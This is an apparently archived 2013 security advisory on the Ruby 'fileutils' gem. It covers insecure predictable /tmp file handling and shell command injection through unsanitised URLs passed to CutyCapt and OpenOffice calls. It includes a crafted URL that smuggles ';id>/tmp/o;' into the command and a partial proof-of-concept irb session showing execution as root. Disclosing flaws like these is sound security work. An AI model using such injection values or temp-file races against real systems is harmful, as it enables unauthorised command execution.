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Remote Fileutils Ruby Gem Remote Command Execution

DarckSol

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Possible remote command execution and insecure file handling in /tmp.
2/23/2013

http://rubygems.org/gems/fileutils

"A set of utility classes to extract meta data from different file types".

Handles files insecurely in /tmp, a directory is created for that file extension say 'zip' and files are maniplated there. This directory can be hijacked and the contents manipulated by a malicious user.

in ./lib/file_utils.rb

15 def zip (target, *sources)
16 targetdir = "{FileUtils::Config.tmp_dir}/zip"
17 id = 1
18 while File.exists?(targetdir)
19 targetdir = "{FileUtils::Config.tmp_dir}/zip#{id}"
20 id += 1
21 end
22 FileUtils.mkdir(targetdir)

where Config.tmp_dir = /tmp

in ./lib/file_utils/config.rb

5 def self.tmp_dir
6 @tmp_dir ||= '/tmp'
7 end

Remote command execution:

From file_utils.rb, doesn't sanitize input on URLs passed to CutyCapt for execution. If a URL contains shell characters say a ';' followed by a command a remote attacker execute a command on the clients system if they are enticed to click an encoded url like:

need to test URL encoding not sure if this is valid.

http://bla.net.org;id>/tmp/o; -> http://tinyurl.com/a5scxzz

7 def capture (url, target)
8 command = FileUtils::Config::Xvfb.command(File.dirname(__FILE__) + "/../bin/CutyCapt --min-width=1024 --min-height=768 --url={url} --out={target}")
9 `#{command}`
10 end

partial PoC if client is tricked into using malicious URL:

irb(main):001:0> `xvfb-run --server-args="-screen 0,1024x768x24" ./CutyCapt --url=http://www.example.org;id>/tmp/foo; --out=/tmp/tempf` xvfb-run: error: Xvfb failed to start
sh: 1: --out=/tmp/tempf: not found
=> ""
irb(main):002:0>

root@ubuntu:~/CutyCapt/cutycapt/CutyCapt ls -l /tmp/foo -rw-r--r-- 1 root root 39 Feb 27 02:56 /tmp/foo root@ubuntu:~/CutyCapt/cutycapt/CutyCapt cat /tmp/foo uid=0(root) gid=0(root) groups=0(root)
root@ubuntu:~/CutyCapt/cutycapt/CutyCapt#

Michael Scherer of Redhat.com found other issues during a discussion about the above issues I found:

In fact, there is the same similar problem in another file :
result = `#{FileUtils::Config::OpenOffice.python} #{command} #{source} #{target} #{FileUtils::Config::OpenOffice.port}`

I quickly checked using irb ( a quick command line to type ruby snippet, and yes, using funky chars result in funky results.

There is another issue in
# Generates a temp filepath for the given extension def temp (extension)

path = "{FileUtils::Config.tmp_dir}/tmp.{extension}" id = 1
while File.exists?(path)

path = "{FileUtils::Config.tmp_dir}/tmp.{id}.#{extension}"
id += 1

end

Since someone could just create the file at the last moment, and make a link so the script would overwrite an arbitrary file.

Thanks to vl4dz and Michael.
 


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